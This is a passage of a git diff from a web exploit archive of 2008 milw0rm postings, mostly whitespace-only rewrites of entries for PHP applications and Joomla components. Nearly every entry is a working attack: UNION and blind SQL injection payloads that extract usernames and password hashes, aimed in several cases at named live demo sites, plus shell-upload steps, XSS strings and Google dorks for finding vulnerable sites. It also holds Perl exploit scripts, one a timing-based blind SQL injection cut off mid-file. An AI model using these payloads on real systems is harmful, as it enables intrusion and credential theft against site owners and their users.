vulnerability operation the following options PHP are required:magic_quotes_gpc=Off + +3. Multiple Cross-site Scripting Vulnerabilities + +Examples of vulnerable files: +/netcat/admin/siteinfo/iframe.inc.php?path=http://ha.ckers.org/scriptlet.html" +/netcat/FCKeditor/neditor.php?form=&control= etc. + +4. HTTP Response Splitting + +Examples of vulnerable files: +/netcat/modules/auth/index.php?logoff=1&redirect=http://www.google.com +/netcat/modules/linkmanager/redirect.php?url=http://www.google.com + +5. CRLF injection + +Vulnerability exists at the moment of value installation %0a in COOKIEvariables. +Vulnerability has been found out at the reference to a file /netcat/add.php. + +# milw0rm.com [2008-12-23] 
diff --git a/platforms/php/webapps/7561.txt b/platforms/php/webapps/7561.txt
index 4a480a776..06e2d8353 100755
--- a/platforms/php/webapps/7561.txt
+++ b/platforms/php/webapps/7561.txt
@@ -1,30 +1,30 @@ -................................................................................................... - -****(remote shell upload/xss)**** - -script: phpGreetCards - -*************************************************************************** -download from:http://www.w2b.ru/download/phpGreetCards.zip - -*************************************************************************** -www.site.com/path/index.php?mode=select&category - -shell: www.site.com/path/userfiles/number_shell.php ------------------------------------------------------------------------------------------ -dork:"powered by phpGreetCards" - -if folder userfiles is forbidden -after get upload file u do right-click and see image properties and u see address file. - ------------------------------------------------------------------------------------------- -xss: -index.php?mode=select&category=>">alert(0)%3B -************************************************** - - -Author: ahmadbady - -************************************************** - -# milw0rm.com [2008-12-23] +................................................................................................... + +****(remote shell upload/xss)**** + +script: phpGreetCards + +*************************************************************************** +download from:http://www.w2b.ru/download/phpGreetCards.zip + +*************************************************************************** +www.site.com/path/index.php?mode=select&category + +shell: www.site.com/path/userfiles/number_shell.php +----------------------------------------------------------------------------------------- +dork:"powered by phpGreetCards" + +if folder userfiles is forbidden +after get upload file u do right-click and see image properties and u see address file. 
+ +------------------------------------------------------------------------------------------ +xss: +index.php?mode=select&category=>">alert(0)%3B +************************************************** + + +Author: ahmadbady + +************************************************** + +# milw0rm.com [2008-12-23] diff --git a/platforms/php/webapps/7562.txt b/platforms/php/webapps/7562.txt index e0a5eafa2..b4a9b9036 100755 --- a/platforms/php/webapps/7562.txt +++ b/platforms/php/webapps/7562.txt 
@@ -1,27 +1,27 @@ -....................................................................... - -****(remote shell upload)**** - -script: phpAdBoard - -*************************************************************************** -download from:http://www.w2b.ru/download/phpAdBoard.zip - -*************************************************************************** -www.site.com/path/index.php -shell: www.site.com/path/photoes/number_shell.php ------------------------------------------------------------------------------------------ -dork:"powered by phpAdBoard" - -if folder photoes is forbidden -after get upload file u do right-click and see image properties and u see address file. - ------------------------------------------------------------------------------------------- -************************************************** - - -Author: ahmadbady - -************************************************** - -# milw0rm.com [2008-12-23] +....................................................................... + +****(remote shell upload)**** + +script: phpAdBoard + +*************************************************************************** +download from:http://www.w2b.ru/download/phpAdBoard.zip + +*************************************************************************** +www.site.com/path/index.php +shell: www.site.com/path/photoes/number_shell.php +----------------------------------------------------------------------------------------- +dork:"powered by phpAdBoard" + +if folder photoes is forbidden +after get upload file u do right-click and see image properties and u see address file. + +------------------------------------------------------------------------------------------ +************************************************** + + +Author: ahmadbady + +************************************************** + +# milw0rm.com [2008-12-23] diff --git a/platforms/php/webapps/7563.txt b/platforms/php/webapps/7563.txt index 7874e6628..98a7d3f7d 100755 
--- a/platforms/php/webapps/7563.txt +++ b/platforms/php/webapps/7563.txt @@ -1,23 +1,23 @@ -****(remote shell upload)**** - -script: phpEmployment - -*************************************************************************** -download from:http://www.w2b.ru/download/phpEmployment.zip - -*************************************************************************** -www.site.com/path/auth.php?mode=regnew&adtype=job - -shell: www.site.com/path/photoes/number_shell.php - ----------------------------------------------------------------------------------------- -dork:"powered by phpEmployment" ------------------------------------------------------------------------------------------- -************************************************** - - -Author: ahmadbady - -************************************************** - -# milw0rm.com [2008-12-23] +****(remote shell upload)**** + +script: phpEmployment + +*************************************************************************** +download from:http://www.w2b.ru/download/phpEmployment.zip + +*************************************************************************** +www.site.com/path/auth.php?mode=regnew&adtype=job + +shell: www.site.com/path/photoes/number_shell.php + +---------------------------------------------------------------------------------------- +dork:"powered by phpEmployment" +------------------------------------------------------------------------------------------ +************************************************** + + +Author: ahmadbady + +************************************************** + +# milw0rm.com [2008-12-23] diff --git a/platforms/php/webapps/7565.txt b/platforms/php/webapps/7565.txt index 4e9fe7528..a2415f693 100755 --- a/platforms/php/webapps/7565.txt +++ b/platforms/php/webapps/7565.txt 
@@ -1,35 +1,35 @@ -============================================================================== -_________________________________{لااله الي لله محمد رسول لله}_________________________________ - ---------------------------------(Samir-M)---------------------------------- - StormBoard Version 1.0.1 (thread.php id=) SQL Injection Vulnerability - -by : Samir-M - -Msn : Km7@Hotmail.De - -from: Morocco - ---------------------------------------------------------------------------- -darck : - -"Powered by : StormBoard Version 1.0.1" - ---------------------------------------------------------------------------- - -Exploit: - -site.com/thread.php?id=-null union select 1,2,3,4,5,6,7,8,concat(user_name,0x3e,user_password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users - - -Dome: -al-andalos.com/thread.php?id=-null+union+all+select+1,2,3,4,5,6,7,8,concat(user_name,0x3e,user_password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users-- - - -Login: -site.com/admin - - ---------------------------------------------------------------------------- -Samir-M > A-flow > Gess-Inject0r > Wassim-Net - ---------------------------------------------------------------------------- -_______________________________________________________________________________ -=============================================================================== - -# milw0rm.com [2008-12-23] +============================================================================== +_________________________________{لااله الي لله محمد رسول لله}_________________________________ + ---------------------------------(Samir-M)---------------------------------- + StormBoard Version 1.0.1 (thread.php id=) SQL Injection Vulnerability + +by : Samir-M + +Msn : Km7@Hotmail.De + +from: Morocco + ---------------------------------------------------------------------------- +darck : + +"Powered by : StormBoard Version 1.0.1" + ---------------------------------------------------------------------------- + +Exploit: + 
+site.com/thread.php?id=-null union select 1,2,3,4,5,6,7,8,concat(user_name,0x3e,user_password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users + + +Dome: +al-andalos.com/thread.php?id=-null+union+all+select+1,2,3,4,5,6,7,8,concat(user_name,0x3e,user_password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users-- + + +Login: +site.com/admin + + ---------------------------------------------------------------------------- +Samir-M > A-flow > Gess-Inject0r > Wassim-Net + ---------------------------------------------------------------------------- +_______________________________________________________________________________ +=============================================================================== + +# milw0rm.com [2008-12-23] diff --git a/platforms/php/webapps/7567.txt b/platforms/php/webapps/7567.txt index 3fb972f68..fca4cb68e 100755 --- a/platforms/php/webapps/7567.txt +++ b/platforms/php/webapps/7567.txt 
@@ -1,47 +1,47 @@ -Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.joomlahbs.com/ - -DorK : inurl:index.php?option=com_lowcosthotels - -Demo : -_______ - - -http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5 - - -http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4 - - -or - - -http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5 - -http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4 - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K| -|_____________________________________________________________________ - - _____ ____ __ __ _ ____ ____ ____ -|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| - | | | |_) | \ V / / _ \ | | _ | | | | - | | | _ < | | / ___ \ | |_| | _ | |___ | |___ - |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| - -# milw0rm.com [2008-12-23] +Joomla Component com_lowcosthotels (id) Blind SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.joomlahbs.com/ + +DorK : inurl:index.php?option=com_lowcosthotels + +Demo : +_______ + + +http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5 + + 
+http://www.leveltensolutions.net/spa/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4 + + +or + + +http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5 + +http://demo.joomlahbs.com/v1/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4 + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K| +|_____________________________________________________________________ + + _____ ____ __ __ _ ____ ____ ____ +|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| + | | | |_) | \ V / / _ \ | | _ | | | | + | | | _ < | | / ___ \ | |_| | _ | |___ | |___ + |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| + +# milw0rm.com [2008-12-23] diff --git a/platforms/php/webapps/7568.txt b/platforms/php/webapps/7568.txt index 3a174c3a2..654d4664f 100755 --- a/platforms/php/webapps/7568.txt +++ b/platforms/php/webapps/7568.txt 
@@ -1,36 +1,36 @@ -Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability -___________________________________ - -Author: Hussin X - -Home : www.IQ-TY.com & www.TrYaG.cc - -___________________________________ - -script : http://www.joomlahbs.com/ & http://www.leveltensolutions.net/spa/ - -DorK : inurl:index.php?option=com_allhotels - -Demo : -_______ - - -http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5 - -http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4 -____________________________( Greetz )_________________________________ -| -| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K| -|_____________________________________________________________________ - - _____ ____ __ __ _ ____ ____ ____ -|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| - | | | |_) | \ V / / _ \ | | _ | | | | - | | | _ < | | / ___ \ | |_| | _ | |___ | |___ - |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| - -# milw0rm.com [2008-12-23] +Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability +___________________________________ + +Author: Hussin X + +Home : www.IQ-TY.com & www.TrYaG.cc + +___________________________________ + +script : http://www.joomlahbs.com/ & http://www.leveltensolutions.net/spa/ + +DorK : inurl:index.php?option=com_allhotels + +Demo : +_______ + + +http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5 + +http://www.leveltensolutions.net/spa/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4 +____________________________( Greetz )_________________________________ +| +| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| 
My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | Sakab +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | G4N0K| +|_____________________________________________________________________ + + _____ ____ __ __ _ ____ ____ ____ +|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| + | | | |_) | \ V / / _ \ | | _ | | | | + | | | _ < | | / ___ \ | |_| | _ | |___ | |___ + |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| + +# milw0rm.com [2008-12-23] diff --git a/platforms/php/webapps/7569.txt b/platforms/php/webapps/7569.txt index 45daeaf4f..d3806ea01 100755 --- a/platforms/php/webapps/7569.txt +++ b/platforms/php/webapps/7569.txt @@ -1,31 +1,31 @@ --------------------------------------------------------------------------- -| Project: Doop <= 1.4.0b CSRF && Upload Shell | -| Author: x0r | -| Email: andry2000@hotmail.it | -|________________________________________________________________________| - - -#-- CSRF Change Admin Pass --# - ----------------------------------------------------------------------- - -
    - - -
    ----------------------------------------------------------------------- - - -#-- Upload Shell --# - -Ok. Una volta nel pannello di amministrazione possiamo uppare qualsiasi -file ( non controlla l'estensione), quindi anche shell...una volta uppata -la shell, possiamo usarla al seguente link: -http://[site]/[path]/pages/[shell.php]. - - -# x0r --- w00t Zone - w00tzone.org - -# milw0rm.com [2008-12-24] +-------------------------------------------------------------------------- +| Project: Doop <= 1.4.0b CSRF && Upload Shell | +| Author: x0r | +| Email: andry2000@hotmail.it | +|________________________________________________________________________| + + +#-- CSRF Change Admin Pass --# + +---------------------------------------------------------------------- + +
    + + +
    +---------------------------------------------------------------------- + + +#-- Upload Shell --# + +Ok. Una volta nel pannello di amministrazione possiamo uppare qualsiasi +file ( non controlla l'estensione), quindi anche shell...una volta uppata +la shell, possiamo usarla al seguente link: +http://[site]/[path]/pages/[shell.php]. + + +# x0r +-- w00t Zone - w00tzone.org + +# milw0rm.com [2008-12-24] diff --git a/platforms/php/webapps/7570.txt b/platforms/php/webapps/7570.txt index a9ce6c7ba..b9e73103a 100755 --- a/platforms/php/webapps/7570.txt +++ b/platforms/php/webapps/7570.txt 
@@ -1,26 +1,26 @@ -############################################################### -# -# ILIAS Learning Management <= 3.7.4 - SQL Injection Vulnerability -# -# Vulnerability discovered by: Lidloses_Auge -# Greetz to: -=Player=- , Suicide, g4ms3, enco, -# Palme, GPM, karamble, Free-Hack -# Date: 24.12.2008 -# -############################################################### -# -# Developer: http://www.ilias.de -# Dork 1: "powered by ILIAS" -# Dork 2: inurl:repository.php ilias -# Description: The GET Parameter "ref_id" in "repository.php" -# contains a Blind SQL Injection Vulnerability -# -# Usertable: usr_data -# Important columns: usr_id, login, passwd -# -# Example: -# http://www.site.com/repository.php?cmd=frameset&ref_id=1+and+ascii(substring((select+passwd+from+usr_data+limit+0,1),1,1))>50-- -# -############################################################### - -# milw0rm.com [2008-12-24] +############################################################### +# +# ILIAS Learning Management <= 3.7.4 - SQL Injection Vulnerability +# +# Vulnerability discovered by: Lidloses_Auge +# Greetz to: -=Player=- , Suicide, g4ms3, enco, +# Palme, GPM, karamble, Free-Hack +# Date: 24.12.2008 +# +############################################################### +# +# Developer: http://www.ilias.de +# Dork 1: "powered by ILIAS" +# Dork 2: inurl:repository.php ilias +# Description: The GET Parameter "ref_id" in "repository.php" +# contains a Blind SQL Injection Vulnerability +# +# Usertable: usr_data +# Important columns: usr_id, login, passwd +# +# Example: +# http://www.site.com/repository.php?cmd=frameset&ref_id=1+and+ascii(substring((select+passwd+from+usr_data+limit+0,1),1,1))>50-- +# +############################################################### + +# milw0rm.com [2008-12-24] diff --git a/platforms/php/webapps/7572.txt b/platforms/php/webapps/7572.txt index 8089fcdd2..de7aaa62b 100755 --- a/platforms/php/webapps/7572.txt +++ b/platforms/php/webapps/7572.txt 
@@ -1,44 +1,44 @@ -############################################################# -Joomla Component com_ice(catid) Blind SQL-injection -############################################################# - - -################################################### -#[~] Author : boom3rang -#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. -#[~] Vulnerability : Blind SQL injection -#[~] Google Dork : inurl:com_ice "catid" --------------------------------------------------- -#[!] Ice Gallery -#[!] 29/08/06 -#[!] Markus Donhauser -#[!] ice.gallery@gmx.net -#[!] 0.5 beta 2 -################################################### - -Example: -http://localHost/path/index.php?option=com_ice&catid=1[SQL code] - - -SQL code: -and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96 - - -LiveDEMO: - -http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=4 >>(False) - -http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=5 >>(True) - -http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96 - - - - -############################## -#[!] Proud 2 be Albanian -#[!] Proud 2 be Muslim -#[!] United States of Albania -############################## - -# milw0rm.com [2008-12-24] +############################################################# +Joomla Component com_ice(catid) Blind SQL-injection +############################################################# + + +################################################### +#[~] Author : boom3rang +#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. +#[~] Vulnerability : Blind SQL injection +#[~] Google Dork : inurl:com_ice "catid" +-------------------------------------------------- +#[!] Ice Gallery +#[!] 29/08/06 +#[!] Markus Donhauser +#[!] ice.gallery@gmx.net +#[!] 
0.5 beta 2 +################################################### + +Example: +http://localHost/path/index.php?option=com_ice&catid=1[SQL code] + + +SQL code: +and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96 + + +LiveDEMO: + +http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=4 >>(False) + +http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=5 >>(True) + +http://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96 + + + + +############################## +#[!] Proud 2 be Albanian +#[!] Proud 2 be Muslim +#[!] United States of Albania +############################## + +# milw0rm.com [2008-12-24] diff --git a/platforms/php/webapps/7573.txt b/platforms/php/webapps/7573.txt index 023d53e16..6d72d1710 100755 --- a/platforms/php/webapps/7573.txt +++ b/platforms/php/webapps/7573.txt 
@@ -1,40 +1,40 @@ -############################################################# -Joomla Component com_liveticker(tid) Blind SQL-injection -############################################################# - - -################################################### -#[~] Author : boom3rang -#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. -#[~] Vulnerability : Blind SQL injection -#[~] Google Dork : inurl:com_liveticker --------------------------------------------------- -#[!] Name : Live Ticker -#[!] Author : raven-worx -#[!] AuthorEmail : info@raven-worx.net -#[!] Version : 1.0.0 -################################################### - -Example: -http://localHost/path/index.php?option=com_liveticker&task=viewticker&tid=[SQL] - - - -LiveDEMO: - - -http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=4 >>(False) - - -http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5 >>(True) - - - - -############################## -#[!] Proud 2 be Albanian -#[!] Proud 2 be Muslim -#[!] United States of Albania -############################## - -# milw0rm.com [2008-12-24] +############################################################# +Joomla Component com_liveticker(tid) Blind SQL-injection +############################################################# + + +################################################### +#[~] Author : boom3rang +#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. +#[~] Vulnerability : Blind SQL injection +#[~] Google Dork : inurl:com_liveticker +-------------------------------------------------- +#[!] Name : Live Ticker +#[!] Author : raven-worx +#[!] AuthorEmail : info@raven-worx.net +#[!] 
Version : 1.0.0 +################################################### + +Example: +http://localHost/path/index.php?option=com_liveticker&task=viewticker&tid=[SQL] + + + +LiveDEMO: + + +http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=4 >>(False) + + +http://www.komponenten.joomlademo.de/index.php?option=com_liveticker&task=viewticker&tid=1 and substring(@@version,1,1)=5 >>(True) + + + + +############################## +#[!] Proud 2 be Albanian +#[!] Proud 2 be Muslim +#[!] United States of Albania +############################## + +# milw0rm.com [2008-12-24] diff --git a/platforms/php/webapps/7574.txt b/platforms/php/webapps/7574.txt index b17152684..14e617f6f 100755 --- a/platforms/php/webapps/7574.txt +++ b/platforms/php/webapps/7574.txt 
@@ -1,36 +1,36 @@ -############################################################# -Joomla Component com_mdigg(category) SQL-injection vulnerability -############################################################# - - -################################################### -#[~] Author : boom3rang -#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. -#[~] Vulnerability : SQL injection -#[~] Google Dork : inurl:com_mdigg --------------------------------------------------- -#[!] Name : mdigg -#[!] CreationDate : 10-12-2007 -#[!] Author : Zhigang Lei -#[!] AuthorEmail : zhigang.lei@gmail.com -#[!] Version : 2.2.8 -################################################### - -Example: -http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit] - - -Exploit: --9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/* - - -LiveDEMO: -http://demo15.joomlaapps.com/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/* - -############################## -#[!] Proud 2 be Albanian -#[!] Proud 2 be Muslim -#[!] United States of Albania -############################## - -# milw0rm.com [2008-12-24] +############################################################# +Joomla Component com_mdigg(category) SQL-injection vulnerability +############################################################# + + +################################################### +#[~] Author : boom3rang +#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1. +#[~] Vulnerability : SQL injection +#[~] Google Dork : inurl:com_mdigg +-------------------------------------------------- +#[!] Name : mdigg +#[!] CreationDate : 10-12-2007 +#[!] Author : Zhigang Lei +#[!] AuthorEmail : zhigang.lei@gmail.com +#[!] 
Version : 2.2.8 +################################################### + +Example: +http://localHost/path/index.php?option=com_mdigg&act=story_lists&task=view&category=[exploit] + + +Exploit: +-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/* + + +LiveDEMO: +http://demo15.joomlaapps.com/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/* + +############################## +#[!] Proud 2 be Albanian +#[!] Proud 2 be Muslim +#[!] United States of Albania +############################## + +# milw0rm.com [2008-12-24] diff --git a/platforms/php/webapps/7575.pl b/platforms/php/webapps/7575.pl index 09feaab9d..37c2a6947 100755 --- a/platforms/php/webapps/7575.pl +++ b/platforms/php/webapps/7575.pl 
@@ -1,44 +1,44 @@ -#!/usr/bin/perl -w - - -#Joomla com_5starhotels Sql injection# -######################################## -#[~] Author : EcHoLL -#[~] www.warezturk.org www.tahribat.com -#[~] Greetz : Black_label TURK Godlike Nitrous - -#[!] Module_Name: com_5starhotels -#[!] Script_Name: Joomla -#[!] Google_Dork: inurl:"com_5starhotels" -######################################## - - -system("color FF0000"); -system("Nohacking"); -print "\t\t-------------------------------------------------------------\n\n"; -print "\t\t| Turkish Securtiy Team |\n\n"; -print "\t\t-------------------------------------------------------------\n\n"; -print "\t\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\n\n"; -print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\n"; -print "\t\t-------------------------------------------------------------\n\n"; - -use LWP::UserAgent; - -print "\nSite ismi Target page:[http://wwww.site.com/path/]: "; - chomp(my $target=); - -$column_name="concat(username,0x3a,password)"; -$table_name="jos_users"; - -$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; -$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); - -$host = $target . "/index.php?option=com_5starhotels&task=showhoteldetails&id=1+union+select+1,".$column_name."+from/**/".$table_name."--"; -$res = $b->request(HTTP::Request->new(GET=>$host));$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ - print "\n[+] Admin Hash : $1\n\n"; - print "# Tebrikler Exploit Calisti! #\n\n"; -} -else{print "\n[-] Exploit Bulunamadı...\n"; -} - -# milw0rm.com [2008-12-24] +#!/usr/bin/perl -w + + +#Joomla com_5starhotels Sql injection# +######################################## +#[~] Author : EcHoLL +#[~] www.warezturk.org www.tahribat.com +#[~] Greetz : Black_label TURK Godlike Nitrous + +#[!] Module_Name: com_5starhotels +#[!] Script_Name: Joomla +#[!] 
Google_Dork: inurl:"com_5starhotels" +######################################## + + +system("color FF0000"); +system("Nohacking"); +print "\t\t-------------------------------------------------------------\n\n"; +print "\t\t| Turkish Securtiy Team |\n\n"; +print "\t\t-------------------------------------------------------------\n\n"; +print "\t\t|Joomla Module com_5starhotels(showhoteldetails&id=)Remote SQL Injection Vuln|\n\n"; +print "\t\t| Coded by: EcHoLL www.warezturk.org |\n\n"; +print "\t\t-------------------------------------------------------------\n\n"; + +use LWP::UserAgent; + +print "\nSite ismi Target page:[http://wwww.site.com/path/]: "; + chomp(my $target=); + +$column_name="concat(username,0x3a,password)"; +$table_name="jos_users"; + +$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); + +$host = $target . "/index.php?option=com_5starhotels&task=showhoteldetails&id=1+union+select+1,".$column_name."+from/**/".$table_name."--"; +$res = $b->request(HTTP::Request->new(GET=>$host));$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){ + print "\n[+] Admin Hash : $1\n\n"; + print "# Tebrikler Exploit Calisti! #\n\n"; +} +else{print "\n[-] Exploit Bulunamadı...\n"; +} + +# milw0rm.com [2008-12-24] diff --git a/platforms/php/webapps/7576.pl b/platforms/php/webapps/7576.pl index 57416f147..59bd3d6f3 100755 --- a/platforms/php/webapps/7576.pl +++ b/platforms/php/webapps/7576.pl 
@@ -1,110 +1,110 @@ -#!/usr/bin/perl -w -# ------------------------------------------------------- -# PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit -# by athos - staker[at]hotmail[dot]it -# download on http://php-fusion.co.uk -# ------------------------------------------------------- -# Usage: -# perl xpl.pl host/path prefix user_id user_pwd target_id -# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1 -# ------------------------------------------------------- -# Note: magic_quotes_gpc off && register globals on -# don't add me on msn messenger -# my email staker.38@gmail.com -# -# Greetz: str0ke,The:Paradox,darkjoker,Key and #cancer :D -# ------------------------------------------------------- -# This is pratically the same vulnerability of 6.01.14 -# version (http://milw0rm.com/exploits/5470) found by -# The:Paradox. PHP-Fusion's coder seems not interested in -# Web Security, isn't him? -# ------------------------------------------------------- -# User Password: my $field = "user_password" ; -# Admin Password: my $field = "user_admin_password"; -# ------------------------------------------------------- - -use strict; -use Digest::MD5('md5_hex'); -use LWP::UserAgent; - - -my $field = "user_password"; -my ($stop,$start,$hash); - - -my $domain = shift; -my $ptable = shift; -my $ulogin = shift; -my $plogin = shift; -my $userid = shift or &usage; - -my @chars = (48..57, 97..102); -my $substr = 1; -my $http = new LWP::UserAgent; - - - -sub send_request -{ - my $post = undef; - my $host = $domain; - my $param = shift @_ or die $!; - - $host .= "/submit.php?stype=l"; - - $http->default_header('Cookie' => "fusion_user=${ulogin}.".md5_hex($plogin)); - $post = $http->post('http://'.$host,[ - 'link_category' => 1, - 'link_name' => 1, - 'link_url' => 1, - 'link_description' => 1, - 'submit_link' => 'Submit+Link', - 'submit_info[pwn]' => $param, - ]); - -} - - -sub give_char -{ - my $send = undef; - my ($charz,$uidz) = @_; - - $send = "' or (select 
if((ascii(substring". - "($field,$uidz,1))=$charz),". - "benchmark(230000000,char(0)),". - "0) from ${ptable}_users where user_id=$userid))#"; - - return $send; -} - - -for(1..32) -{ - foreach my $set(@chars) - { - my $start = time(); - - send_request(give_char($set,$substr)); - - my $stop = time(); - - if($stop - $start > 6) - { - syswrite(STDOUT,chr($set)); - $substr++; - last; - } - } -} - -sub usage -{ - print "PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit\n"; - print "by athos - staker[at]hotmail[dot]it\n"; - print "Usage: perl $0 [host/path] [table prefix] [id] [password] [target id]\n"; - print "Usage: perl $0 localhost/php-fusion fusion 5 p4ssw0rd 1\n"; - exit; -} - -# milw0rm.com [2008-12-24] +#!/usr/bin/perl -w +# ------------------------------------------------------- +# PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit +# by athos - staker[at]hotmail[dot]it +# download on http://php-fusion.co.uk +# ------------------------------------------------------- +# Usage: +# perl xpl.pl host/path prefix user_id user_pwd target_id +# perl xpl.pl localhost/php-fusion fusion 5 anarchy 1 +# ------------------------------------------------------- +# Note: magic_quotes_gpc off && register globals on +# don't add me on msn messenger +# my email staker.38@gmail.com +# +# Greetz: str0ke,The:Paradox,darkjoker,Key and #cancer :D +# ------------------------------------------------------- +# This is pratically the same vulnerability of 6.01.14 +# version (http://milw0rm.com/exploits/5470) found by +# The:Paradox. PHP-Fusion's coder seems not interested in +# Web Security, isn't him? 
